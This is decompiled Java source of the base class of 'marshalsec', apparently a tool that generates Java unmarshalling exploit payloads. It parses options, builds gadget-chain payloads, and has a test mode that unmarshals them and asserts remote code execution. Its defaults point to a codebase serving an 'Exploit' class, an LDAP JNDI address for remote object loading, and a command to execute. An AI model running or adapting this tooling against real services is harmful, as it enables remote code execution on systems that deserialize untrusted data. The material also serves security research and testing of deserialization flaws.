/*
 * Decompiled with CFR 0.152.
 */
package marshalsec;

import java.io.IOException;
import java.lang.reflect.Method;
import java.util.Arrays;
import java.util.LinkedList;
import marshalsec.EscapeType;
import marshalsec.SideEffectSecurityManager;
import marshalsec.TestingSecurityManager;
import marshalsec.UtilFactory;
import marshalsec.gadgets.Args;
import marshalsec.gadgets.GadgetType;
import marshalsec.gadgets.Primary;
import marshalsec.gadgets.ToStringUtil;

public abstract class MarshallerBase<T>
implements UtilFactory {
    public static final String defaultCodebase = "{exploit.codebase:http://localhost:8080/}";
    public static final String defaultCodebaseClass = "{exploit.codebaseClass:Exploit}";
    public static final String defaultJNDIUrl = "{exploit.jndiUrl:ldap://localhost:1389/obj}";
    public static final String defaultExecutable = "{exploit.exec:/usr/bin/gedit}";

    public abstract T marshal(Object var1) throws Exception;

    public abstract Object unmarshal(T var1) throws Exception;

    @Override
    public Object makeToStringTriggerUnstable(Object obj) throws Exception {
        return ToStringUtil.makeSpringAOPToStringTrigger(obj);
    }

    protected void run(String[] args) {
        try {
            boolean test = false;
            boolean all = false;
            boolean verbose = false;
            EscapeType escape = EscapeType.NONE;
            int argoff = 0;
            GadgetType type = null;
            while (argoff < args.length && args[argoff].charAt(0) == '-') {
                if (args[argoff].equals("-t")) {
                    test = true;
                    ++argoff;
                    continue;
                }
                if (args[argoff].equals("-a")) {
                    all = true;
                    ++argoff;
                    continue;
                }
                if (args[argoff].equals("-e")) {
                    escape = EscapeType.valueOf(args[++argoff]);
                    ++argoff;
                    continue;
                }
                if (args[argoff].equals("-v")) {
                    verbose = true;
                    ++argoff;
                    continue;
                }
                ++argoff;
            }
            try {
                if (!all && args.length > argoff) {
                    type = GadgetType.valueOf(args[argoff].trim());
                    ++argoff;
                }
            }
            catch (IllegalArgumentException e) {
                System.err.println("Unsupported gadget type " + args[argoff]);
                System.exit(-1);
            }
            if (!all && type == null) {
                System.err.println("No gadget type specified, available are " + Arrays.toString((Object[])this.getSupportedTypes()));
                System.exit(-1);
            }
            if (all) {
                this.runAll(test, verbose, false, escape);
            } else {
                String[] gadgetArgs = new String[args.length - argoff];
                System.arraycopy(args, argoff, gadgetArgs, 0, args.length - argoff);
                this.doRun(type, test, verbose, false, escape, gadgetArgs);
            }
        }
        catch (Exception e) {
            e.printStackTrace(System.err);
        }
    }

    public void runTests() throws Exception {
        this.runAll(true, false, true, EscapeType.NONE);
    }

    private void runAll(boolean test, boolean verbose, boolean throwEx, EscapeType escape) throws Exception {
        for (GadgetType t : this.getSupportedTypes()) {
            Method tm = this.getTargetMethod(t);
            Args a = tm.getAnnotation(Args.class);
            if (a == null) {
                throw new Exception("Missing Args in " + (Object)((Object)t));
            }
            if (a.noTest()) continue;
            String[] defaultArgs = a.defaultArgs();
            this.doRun(t, test, verbose, throwEx, escape, defaultArgs);
        }
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    private void doRun(GadgetType type, boolean test, boolean verbose, boolean throwEx, EscapeType escape, String[] gadgetArgs) throws Exception, IOException {
        Object marshal;
        try {
            Object alreadyMarshalled;
            System.setSecurityManager(new SideEffectSecurityManager());
            Object o = this.createObject(type, MarshallerBase.expandArguments(gadgetArgs));
            marshal = o instanceof byte[] || o instanceof String ? (alreadyMarshalled = o) : this.marshal(o);
        }
        finally {
            System.setSecurityManager(null);
        }
        if (!test || verbose) {
            System.err.println();
            this.writeOutput(marshal, escape);
        }
        if (test) {
            System.err.println();
            System.err.println("Running gadget " + (Object)((Object)type) + ":");
            this.test(marshal, throwEx);
        }
    }

    private static String[] expandArguments(String[] gadgetArgs) {
        String[] expanded = new String[gadgetArgs.length];
        for (int i = 0; i < gadgetArgs.length; ++i) {
            expanded[i] = MarshallerBase.expandArgument(gadgetArgs[i]);
        }
        return expanded;
    }

    private static String expandArgument(String string) {
        if (string.charAt(0) == '{' && string.charAt(string.length() - 1) == '}') {
            String key;
            int defSep = string.indexOf(58, 1);
            String defVal = null;
            if (defSep >= 0) {
                key = string.substring(1, defSep);
                defVal = string.substring(defSep + 1, string.length() - 1);
            } else {
                key = string.substring(1, string.length() - 1);
            }
            return System.getProperty(key, defVal);
        }
        return string;
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    protected void test(T marshal, boolean throwEx) throws Exception {
        block10: {
            Throwable ex = null;
            TestingSecurityManager s = new TestingSecurityManager();
            try {
                System.setSecurityManager(s);
                this.unmarshal(marshal);
            }
            catch (Exception e) {
                ex = MarshallerBase.extractInnermost(e);
            }
            finally {
                System.setSecurityManager(null);
            }
            try {
                s.assertRCE();
            }
            catch (Exception e) {
                System.err.println("Failed to achieve RCE:" + e.getMessage());
                if (ex != null) {
                    ex.printStackTrace(System.err);
                }
                if (!throwEx) break block10;
                if (ex instanceof Exception) {
                    throw (Exception)ex;
                }
                throw e;
            }
        }
    }

    private static Throwable extractInnermost(Throwable e) {
        if (e.getCause() != null && e.getCause() != e) {
            return MarshallerBase.extractInnermost(e.getCause());
        }
        return e;
    }

    private void writeOutput(T data, EscapeType escape) throws IOException {
        if (data instanceof byte[]) {
            System.out.write((byte[])data);
        } else if (data instanceof String) {
            switch (escape) {
                case JAVA: {
                    System.out.println(MarshallerBase.escapeJavaString((String)data));
                    break;
                }
                default: {
                    System.out.println((String)data);
                    break;
                }
            }
        } else {
            throw new UnsupportedOperationException();
        }
    }

    private static String escapeJavaString(String data) {
        return data.replaceAll("([\"\\\\])", "\\\\$1");
    }

    protected Object createObject(GadgetType t, String[] args) throws Exception {
        Method m = this.getTargetMethod(t);
        if (!t.getClazz().isAssignableFrom(this.getClass())) {
            throw new Exception("Gadget not supported for this marshaller");
        }
        Args a = m.getAnnotation(Args.class);
        if (a != null && args.length < a.minArgs()) {
            throw new Exception(String.format("Gadget %s requires %d arguments: %s", new Object[]{t, a.minArgs(), a.args() != null ? Arrays.toString(a.args()) : ""}));
        }
        return m.invoke((Object)this, this, args);
    }

    public GadgetType[] getSupportedTypes() {
        LinkedList<GadgetType> types = new LinkedList<GadgetType>();
        for (GadgetType t : GadgetType.values()) {
            if (!t.getClazz().isAssignableFrom(this.getClass())) continue;
            types.add(t);
        }
        return types.toArray(new GadgetType[types.size()]);
    }

    public Method getTargetMethod(GadgetType t) throws Exception {
        Method[] methods = t.getClazz().getMethods();
        Method m = null;
        if (methods.length != 1) {
            for (Method cand : methods) {
                if (cand.getAnnotation(Primary.class) == null) continue;
                m = cand;
                break;
            }
            if (m == null) {
                throw new Exception("Gadget interface contains no or multiple methods");
            }
        } else {
            m = methods[0];
        }
        return this.getClass().getMethod(m.getName(), m.getParameterTypes());
    }
}

